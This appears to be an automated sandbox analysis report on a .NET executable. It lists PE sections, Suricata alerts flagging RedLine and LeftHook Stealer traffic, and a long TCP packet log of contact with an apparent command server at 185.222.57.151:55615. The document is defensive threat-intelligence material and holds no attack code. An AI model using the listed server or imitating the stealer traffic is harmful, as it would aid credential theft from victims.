                    .text0x20000x842980x8440047a9d733aaf1a286ef3613a2d7639729False0.9371547879253308data7.9275615283647385IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rsrc0x880000x1a900x1c009d287d3493c1f36b4b63739a7b10d877False0.7892020089285714data7.256872537280392IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x8a0000xc0x2009f9ad7bd097fddfbb7d07f5e7b6c4eafFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_ICON0x881180x162cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.906800563777308
                    RT_GROUP_ICON0x897440x14data0.9
                    RT_GROUP_ICON0x897580x14data1.05
                    RT_VERSION0x8976c0x324data0.43905472636815923

                    Imports

                    DLLImport
                    mscoree.dll_CorExeMain

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                    2024-07-27T04:12:23.889248+0200TCP2045000ET MALWARE RedLine Stealer - CheckConnect Response5561549709185.222.57.151192.168.2.5
                    2024-07-27T04:12:59.540993+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971940.127.169.103192.168.2.5
                    2024-07-27T04:12:18.578362+0200TCP2849352ETPRO MALWARE RedLine - SetEnvironment Request4970855615192.168.2.5185.222.57.151
                    2024-07-27T04:12:18.878917+0200TCP2849662ETPRO MALWARE RedLine - CheckConnect Request4970955615192.168.2.5185.222.57.151
                    2024-07-27T04:12:27.258175+0200TCP2045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound5561549709185.222.57.151192.168.2.5
                    2024-07-27T04:12:20.154106+0200TCP2848200ETPRO MALWARE RedLine - GetUpdates Request4971155615192.168.2.5185.222.57.151
                    2024-07-27T04:12:18.200600+0200TCP2045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound5561549706185.222.57.151192.168.2.5
                    2024-07-27T04:12:27.715047+0200TCP2849352ETPRO MALWARE RedLine - SetEnvironment Request4971855615192.168.2.5185.222.57.151
                    2024-07-27T04:12:14.694601+0200TCP2045000ET MALWARE RedLine Stealer - CheckConnect Response5561549706185.222.57.151192.168.2.5
                    2024-07-27T04:12:09.597710+0200TCP2849662ETPRO MALWARE RedLine - CheckConnect Request4970655615192.168.2.5185.222.57.151
                    2024-07-27T04:12:24.113320+0200TCP2849351ETPRO MALWARE RedLine - EnvironmentSettings Request4970955615192.168.2.5185.222.57.151
                    2024-07-27T04:12:21.374284+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971040.127.169.103192.168.2.5
                    2024-07-27T04:12:14.910173+0200TCP2849351ETPRO MALWARE RedLine - EnvironmentSettings Request4970655615192.168.2.5185.222.57.151

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 27, 2024 04:12:08.948276997 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:08.954782963 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:08.954907894 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:08.972822905 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:08.977691889 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:09.332573891 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:09.337548018 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:09.555092096 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:09.597709894 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:14.689630985 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:14.689677954 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:14.694601059 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:14.694803953 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:14.861968040 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:14.910172939 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:14.959398031 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:14.959440947 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:14.959476948 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:14.959494114 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:14.959512949 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:14.959547997 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:14.959556103 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:14.959584951 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:14.959628105 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:15.037091970 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:15.037133932 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:15.037192106 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:15.037225008 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:15.037259102 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:15.037281990 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:15.037291050 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:15.037292004 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:15.037333965 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.157958984 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.158338070 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.163228035 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.163297892 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.164112091 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.168864012 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.200599909 CEST5561549706185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.200671911 CEST4970655615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.203702927 CEST4970955615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.208502054 CEST5561549709185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.208595991 CEST4970955615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.217052937 CEST4970955615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.221951962 CEST5561549709185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.519849062 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.525105000 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.525122881 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.525135994 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.525141001 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.525152922 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.525177956 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.525197983 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.525233984 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.525247097 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.525274038 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.525285959 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.525310993 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.525331974 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.525507927 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.525650978 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.530078888 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.530157089 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.530169010 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.530199051 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.530226946 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.530272961 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.530286074 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.530297041 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.530334949 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.566603899 CEST4970955615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.571732044 CEST5561549709185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.578200102 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.578361988 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.626152039 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.626581907 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.638618946 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.638968945 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.644191027 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644203901 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644216061 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644227028 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644238949 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644267082 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.644330025 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644330978 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.644340992 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644354105 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644366026 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644376993 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644387007 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.644387960 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644409895 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644413948 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.644421101 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644423008 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.644432068 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644445896 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644468069 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644504070 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.644522905 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644534111 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644546032 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644736052 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644747972 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644789934 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.644799948 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644810915 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644850016 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.644861937 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644871950 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.644920111 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.644951105 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.644963026 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.645045042 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.645056009 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.645071030 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.645114899 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.650490046 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.650645971 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.650706053 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.650849104 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.650942087 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.650954962 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.650965929 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.650995016 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651006937 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651037931 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651073933 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651091099 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651104927 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651115894 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651143074 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651154041 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651165009 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651187897 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651238918 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651251078 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651261091 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651299000 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651309967 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651318073 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651321888 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651360035 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651602983 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651614904 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651626110 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651638031 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651648998 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651659966 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651670933 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651670933 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651681900 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651684999 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651693106 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651705027 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651715994 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651726961 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651729107 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651737928 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651750088 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651752949 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651762009 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651772976 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651782990 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651784897 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651796103 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651806116 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651807070 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651817083 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651829004 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651838064 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651849031 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651859045 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651861906 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651870012 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651880980 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651892900 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651904106 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651915073 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651926041 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651927948 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651937008 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651941061 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651948929 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651959896 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651971102 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651983023 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.651985884 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.651993990 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.652002096 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.652004957 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.652017117 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.652028084 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.652036905 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.652039051 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.652050018 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.652062893 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.652117014 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.656662941 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.656686068 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.656732082 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.656743050 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.656789064 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.656831026 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.656856060 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.656879902 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.656905890 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.656912088 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.656918049 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.656965017 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657008886 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657157898 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657176018 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657187939 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657207966 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657219887 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657244921 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657275915 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657283068 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657294989 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657435894 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657447100 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657459021 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657470942 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657481909 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657494068 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657502890 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657505989 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657557011 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657612085 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657743931 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657756090 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657767057 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657778025 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657788992 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657799006 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657800913 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657809973 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657820940 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657845974 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657941103 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657953024 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657964945 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657969952 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657975912 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657987118 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657999039 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658005953 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658009052 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658014059 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658020973 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658032894 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658041954 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658044100 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658075094 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658083916 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658124924 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658128023 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658139944 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658150911 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658163071 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658183098 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658195019 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658205032 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658205986 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658216000 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658226967 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658237934 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658262014 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658262968 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658276081 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658287048 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658298016 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658302069 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658312082 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658320904 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658323050 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658334970 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658346891 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658363104 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658375025 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658385992 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658406973 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658452988 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658464909 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658476114 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658487082 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658488035 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658509016 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658520937 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658531904 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658543110 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658550978 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658570051 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658571005 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658582926 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658595085 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658606052 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658611059 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658617020 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658628941 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658651114 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658658981 CEST4970855615192.168.2.5185.222.57.151
